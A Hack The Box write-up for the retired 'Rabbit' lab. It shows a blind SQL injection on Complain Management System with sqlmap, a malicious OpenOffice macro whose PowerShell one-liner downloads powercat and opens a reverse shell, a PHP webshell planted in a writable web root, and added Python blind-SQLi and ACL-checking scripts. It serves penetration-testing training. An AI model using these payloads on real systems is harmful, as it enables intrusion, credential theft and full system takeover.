HTB – Rabbit

Today we are going to solve another CTF challenge, "Rabbit", a retired lab from Hack The Box for online penetration-testing practice.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

These labs are reachable online and have a static IP. Rabbit's IP is 10.10.10.71, so let's start with a basic nmap port and service scan:

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds

The scan paints a clear picture: a Windows Server 2008 R2 domain controller (DNS, Kerberos, LDAP, global catalog) that also hosts Exchange (SMTP on 25/587, OWA behind IIS on 443) and, separately, an Apache 2.4.27/PHP 5.6 stack on 8080 with MySQL on 3306. Note the 5-hour clock skew, which matters if we ever need Kerberos. Let's enumerate the web server on port 8080 with Gobuster:
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

Browsing to /complain reveals a Complain Management System. Let's check searchsploit for known issues:

root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
    //$_SESSION['user_id'] = $row['sid'];
    if($userName == 'admin' && $password == 'admin123'){
        $_SESSION['user_id'] = 0;
        $_SESSION['user_name'] = 'Administrator';
        $_SESSION['user_type'] = 'admin';
        header('Location: '.WEB_ROOT.'index.php');
        exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

Following the advisory, we register a Customer account, then log in with the hard-coded admin credentials (admin:admin123) and capture the admin-side assignComplain request, with its PHPSESSID cookie, for sqlmap. The compId parameter is the injection point:


c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:25] [INFO] cracked password 'barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/
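The injection sqlmap automates above, reproduced offline as an added example (this is not code from the writeup or from Complain Management System). The two handlers are assumptions modelling what sqlmap reports: a compId value concatenated into the query, where the only visible effect is whether the complaint is found. The users table is the dump above loaded into an in-memory SQLite database with a constructed schema; the extraction uses SQLite's UNICODE() where MySQL would use ORD().

```python
"""Boolean-based blind SQL injection on compId, reproduced offline.

Added example, not code from the writeup or from Complain Management System.
ComplainApp is a stand-in for process.php: the vulnerable handler and its
fixed twin are assumptions modelling the behaviour sqlmap reports. The users
rows are the dump from the writeup; the schema is constructed.
"""
import sqlite3

# Constructed users table: usernames and MD5 hashes as dumped by sqlmap.
USERS = [
    ("Zephon", "13fa8abd10eed98d89fd6fc678afaf94"),
    ("Kain", "33903fbcc0b1046a09edfaa0a65e8f8c"),
    ("Dumah", "33da7a40473c1637f1a2e142f4925194"),
    ("Magnus", "370fc3559c9f0bff80543f2e1151c537"),
    ("Raziel", "719da165a626b4cf23b626896c213b84"),
    ("Moebius", "a6f30815a43f38ec6de95b9a9d74da37"),
    ("Ariel", "b9c2538d92362e0e18e52d0ee9ca0c6f"),
    ("Turel", "d322dc36451587ea2994c84c9d9717a1"),
    ("Dimitri", "d459f76a5eeeed0eca8ab4476c144ac4"),
    ("Malek", "dea56e47f1c62c30b83b70eb281a6c39"),
]


class ComplainApp:
    """Stand-in for the web app; counts requests so the cost of blind extraction is visible."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE complains (id INTEGER PRIMARY KEY, descr TEXT)")
        self.db.execute("CREATE TABLE users (username TEXT, password TEXT)")
        self.db.execute("INSERT INTO complains VALUES (10, 'constructed sample complaint')")
        self.db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
        self.requests = 0

    def assign_complain_vulnerable(self, comp_id):
        """Hypothetical vulnerable handler: compId is concatenated into the SQL.
        Returns True for the 'complaint found' page and False for the error page."""
        self.requests += 1
        row = self.db.execute(f"SELECT id FROM complains WHERE id={comp_id}").fetchone()
        return row is not None

    def assign_complain_fixed(self, comp_id):
        """Hardened handler: validate the type, then bind the value.
        Injected SQL never reaches the parser, so the oracle disappears."""
        self.requests += 1
        try:
            cid = int(comp_id)
        except (TypeError, ValueError):
            return False
        row = self.db.execute("SELECT id FROM complains WHERE id=?", (cid,)).fetchone()
        return row is not None


def _bisect(oracle, lo, hi):
    """Smallest v in [lo, hi] for which oracle(v) (meaning 'value > v') is False."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(app, subquery, max_len=64):
    """Recover the result of `subquery` through the true/false oracle:
    binary-search the length, then each character's code point (printable ASCII)."""
    ask = lambda cond: app.assign_complain_vulnerable(f"10 AND ({cond})")
    length = _bisect(lambda n: ask(f"LENGTH(({subquery}))>{n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # MySQL: ORD(SUBSTRING(...)); SQLite: UNICODE(SUBSTR(...))
        code = _bisect(lambda c: ask(f"UNICODE(SUBSTR(({subquery}),{pos},1))>{c}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    app = ComplainApp()
    secret = extract(app, "SELECT password FROM users WHERE username='Ariel'")
    print(secret, "recovered in", app.requests, "requests")
```

Running it recovers Ariel's 32-character hash in roughly 230 requests: seven per character plus a few for the length, which is why "blind" does not mean "slow to exploit". The fixed handler rejects anything that is not an integer and binds the value, so the same probes simply return the error page.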

Exploitation

Where can we use these credentials? The box runs Exchange, so let's try Outlook Web Access:
https://10.10.10.71/owa

Of the cracked credentials, the following pair is valid for OWA:

Ariel:pussycatdolls

Once logged in to /owa, the first thing to do is read the mail.

From the emails we learn that a malicious OpenOffice document is a viable way to a shell, but also that PowerShell is constrained and Windows Defender is running, so the payload has to be chosen with that in mind. Metasploit has a module that builds such a document:

exploit/multi/misc/openoffice_document_macro

The generated .odt is a zip archive: rename it to .zip, extract it, and edit the macro so that the module's payload command is replaced by:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Because of the PowerShell restriction we add -version 2. This starts the PowerShell 2.0 engine, which predates Constrained Language Mode and therefore does not enforce it:

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Repack the archive and rename it back to .odt.

Send an email to all users with the malicious .odt attached. A practical note on this version of OWA: attaching files works reliably only from Internet Explorer, not from Edge, Chrome or Firefox.

Now wait for a user to open the document (this takes roughly 7 minutes; if nothing has happened after 10, reset the box). The web server log shows powercat being fetched and the listener catches the shell:

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

The web service on port 8080 is served by WampServer (wamp64). WAMP registers Apache as a Windows service, which commonly runs as LocalSystem, so a writable web root would hand us SYSTEM. First check the ACL on the directory:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>
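An added triage helper for listings like the one above (not part of the writeup): it parses cacls output, including the multi-line "special access" ACEs, and flags entries that give a low-privileged principal a write-class right together with the inheritance scope that decides whether subfolders such as www are affected. The SAMPLE string is the listing above embedded as constructed input; the LOW_PRIV set and the rights treated as write-class are assumptions to tune per environment.

```python
"""Flag ACEs in a cacls listing that let low-privileged principals write.

Added example, not from the writeup. The parser targets the cacls output
format shown above; SAMPLE is that listing embedded as constructed input.
LOW_PRIV, WRITE_SIMPLE and WRITE_SPECIFIC are assumptions (tune per environment).
"""
import re

SAMPLE = """c:\\wamp64 NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F
BUILTIN\\Administrators:(OI)(CI)(ID)F
BUILTIN\\Users:(OI)(CI)(ID)R
BUILTIN\\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F
"""

# Principals that every authenticated or interactive user is a member of (assumption).
LOW_PRIV = {"BUILTIN\\Users", "Everyone",
            "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
# cacls simple rights that imply write access: Full, Change, Write.
WRITE_SIMPLE = {"F", "C", "W"}
# Specific rights that allow adding/changing content or rewriting the ACL.
# On a directory FILE_WRITE_DATA/FILE_APPEND_DATA mean 'create files/subfolders'.
WRITE_SPECIFIC = {"FILE_WRITE_DATA", "FILE_APPEND_DATA", "FILE_DELETE_CHILD",
                  "DELETE", "WRITE_DAC", "WRITE_OWNER"}

ACE_RE = re.compile(
    r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?"      # the first ACE line carries the path
    r"(?P<principal>[^:]+?):"
    r"(?P<flags>(?:\([A-Z]+\))*)"              # (OI)(CI)(IO)(ID) ...
    r"(?:(?P<simple>[FCWRN])|\(special access:\))$"
)


def parse_cacls(text):
    """Return one dict per ACE: path, principal, flags (set), rights (set)."""
    aces, current, path = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ACE_RE.match(line)
        if m:
            path = m.group("path") or path
            flags = set(re.findall(r"\(([A-Z]+)\)", m.group("flags")))
            rights = {m.group("simple")} if m.group("simple") else set()
            current = {"path": path, "principal": m.group("principal"),
                       "flags": flags, "rights": rights}
            aces.append(current)
        elif current is not None and re.fullmatch(r"[A-Z_]+", line):
            # continuation line of a '(special access:)' ACE
            current["rights"].add(line)
    return aces


def find_weak_aces(text):
    """(path, principal, write rights, inheritance scope) for every risky ACE."""
    weak = []
    for ace in parse_cacls(text):
        if ace["principal"] not in LOW_PRIV:
            continue
        hit = ace["rights"] & (WRITE_SIMPLE | WRITE_SPECIFIC)
        if not hit:
            continue
        scope = []
        if "CI" in ace["flags"]:
            scope.append("inherited by subfolders")
        if "OI" in ace["flags"]:
            scope.append("inherited by files")
        if "IO" in ace["flags"]:
            scope.append("inherit-only, not the folder itself")
        weak.append((ace["path"], ace["principal"], sorted(hit),
                     ", ".join(scope) or "this folder only"))
    return weak


if __name__ == "__main__":
    for path, who, rights, scope in find_weak_aces(SAMPLE):
        print(f"{path}: {who} has {', '.join(rights)} ({scope})")
```

On the listing above it reports the two BUILTIN\Users entries with FILE_APPEND_DATA and FILE_WRITE_DATA, both container-inherited: every subfolder of c:\wamp64, www included, lets any user create files.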

The two special-access ACEs give BUILTIN\Users FILE_WRITE_DATA and FILE_APPEND_DATA on c:\wamp64, and the (CI) flag means they are inherited by every subfolder, including the web root www. Any user can therefore drop a file there. Let's upload a PHP webshell:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

The webshell runs as NT AUTHORITY\SYSTEM, so we can read root.txt directly, and a full SYSTEM shell is just a powercat call through the same webshell.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/
